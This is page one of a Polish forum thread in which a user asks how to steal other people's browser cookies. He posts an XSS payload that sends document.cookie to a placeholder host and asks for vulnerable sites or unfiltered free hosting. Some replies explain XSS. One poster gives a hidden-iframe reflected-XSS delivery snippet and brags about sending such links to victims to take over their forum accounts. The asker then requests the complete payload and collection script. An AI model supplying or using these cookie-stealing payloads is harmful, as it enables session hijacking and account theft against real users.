Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 16

Temat: Cookies

  1. #1
    Zarejestrowany
    Jun 2007
    Postów
    10

    Domyślnie Cookies

    Jak pobrać cookie od użytkownika sieci internet. Czytałem, że można to zrobić metodą SQL injection, ale żeby się to udało trzeba było znaleźć serwer podatny na ataki xss. Jeśli znacie jakiś sposób, lub znacie serwer podatny na atak, gdzie można wkleić zapytanie typu <script>self.location.href='http://xxx/xxx.php?user='%2Bescape(document.cookie);</script>gdzie zapisuje cookiesy do pliku
    lub darmowy hosting bez filtrów typu dodawanie backshlashów lub usuwanie tagów to byłbym bardzo wdzięczny. Proszę o szybką odpowiedź. Z góry wielkie dzięki !

  2. #2
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    hehe nio widzisz to o czym mówisz sa to ataki xss na aplikcje internetowe - błąd musi być w samej aplikacji a nie w serwerze - serwer może być jak najbardziej bezpieczny a aplikacja.. cuż nie
    wycinanie znaczków przez apache nie pomoże w zabezpieczeniu strony! - tqm gdzieś to opisywał na forum więc poszukaj!

    polecam:
    http://www.gajdaw.pl/varia/xss.html
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    @sidknot - mylisz pojecia... SQL injection to do baz danych a nie do cookies z przegladarek To co mowisz to XSS i sposobow na 'wyciagniecie' komus ciacha jest calkiem calkiem sporo.

    Aby XSS mial sens musialbys wstawic cos do kodu strony na ktorej to ma sens... np jakies community sites, itp... inaczej to bez sensu.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  4. #4
    Zarejestrowany
    Jun 2007
    Postów
    10

    Domyślnie

    tqm, właśnie o to mi chodzi tylko na jakiej stronie można to wstawić i jakie są sposoby ? Jeszcze jedno pytanie, czy da sie to zrobic na darmowym hostingu yoyo.pl lub 110mb.com ?

  5. #5
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Mieszasz tematy jak dla mnie...

    Jedna sprawa z XSS to ze gdzies umieszczasz kod ktory sie wykona jak ktos wejdzie na strone. Aby to mialo sens, musi to byc jakas strona na ktorej jest np jakies logowanie ktore zapisuje dane o sesji w cookie. Wtedy na stronie np swojego profilu albo w ogloszeniu dajesz XSS ktory sie wykona u ludzi ktorzy zobacza ta strone... Co wykonuje ten XSS i jak zebrac dane to inna sprawa.

    Jesli zrobisz sobie stronke z czyms tam i nawet ktos na ta strone przyjdzie to nie odczytasz cookie ot tak sobie, bo przeciez Twoja strona zadnego nie ustawia, prawda?

    Rozrysuj sobie wszystko na bloczkach, ponumeruj etapy i opisz... Jak zrozumiesz jak to dziala tak na prawde to wtedy pogadamy dalej.

    XSS to nie jest taka magia, ze zapraszasz kogos na swoja stronke i ona mu wrzuca XSS'a, ktory sie wykonuje i wysyla Ci na maila cookie z przegladarki ofiary. Juz sama definicja skrotu XSS wyjasnia jak to dziala!
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  6. #6
    Zarejestrowany
    Jun 2007
    Postów
    10

    Domyślnie

    tqm, ja wszystko rozumiem tylko się niepoprawnie wyslawiam
    Próbowalem z tego linka co dal emce i wszystko dziala tylko ze zapisuje cookiesy wyslane do mnie z mojego serwera a nie z tej strony co ja chce, np dostalem cookiesy ze strony www.jeden.pl (nazwa zmyślona), chce je zapisac w ten sposob co jest w linku i sie zapisuja cookiesy dostane z serwera na ktorym jest skrypt a nie z tej strony. Jak zrobic zeby mi zapisalo cookiesy otrzymane z danej strony (przykladowo www.jeden.pl) ?

  7. #7
    Avatar ble34
    ble34 jest offline jestem bugiem
    Zarejestrowany
    Oct 2006
    Skąd
    krzesło
    Postów
    681

    Domyślnie

    musisz kod umieści c na stronie zktórei chcesz wyciągnąć ciacho

  8. #8
    Zarejestrowany
    Jun 2007
    Postów
    10

    Domyślnie

    Chodzi ci o link do skryptu ? Bo jeśli tak to wkleilem go na strone z ktorej chcialem cookiesy, weszlem przez niego i dalej jest to samo . Moim zdaniem jest to tak ze cookiesy z serwera na ktorym jest skrypt sa wysylane szybciej niz pobierane od uzytkownika, dlatego zapisuje cookiesy z serwera, ale jak temu zaradzić ?

  9. #9
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    XSS to nie jest taka magia, ze zapraszasz kogos na swoja stronke i ona mu wrzuca XSS'a, ktory sie wykonuje i wysyla Ci na maila cookie z przegladarki ofiary.
    <iframe style="visibility: hidden" src="http://cos.com/xss.php?search=%22><script>..."></iframe>
    ja tak robie, wysyłam linka przez gg czy cuś, ofiara klika, ogląda piękny error 500, a ja mam jej konto na forum

    @topic
    Jak chcesz komuś podpieprzyć ciacha, to pamiętaj że zmienna document.cookie je przechowuje. Potraktowana escape() wysyła znaki \r\n oraz wszystko co mogło by przeszkodzić w ich odebranu.
    Naucz się javascriptu i php (1-2 dni max), a będziesz wiedziałco to XSS>

  10. #10
    Zarejestrowany
    Jun 2007
    Postów
    10

    Domyślnie

    Podstawy javascript i php znam, tylko chodzi o to, że nie pobiera cookiesów z tej strony co chce tylko wypisuje cookiesy z serwera na którym jest skrypt. 31337 mógłbyś mi wysłać to całe zapytanie( oczywiście z zamazaniem serwera) i kod tego skryptu na PW. Byłbym bardzo wdzięczny. Bardzo, tak, bardzo mi na tym zależy. I oczywiście podszkole się jeszcze w programowaniu php i javascript.

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52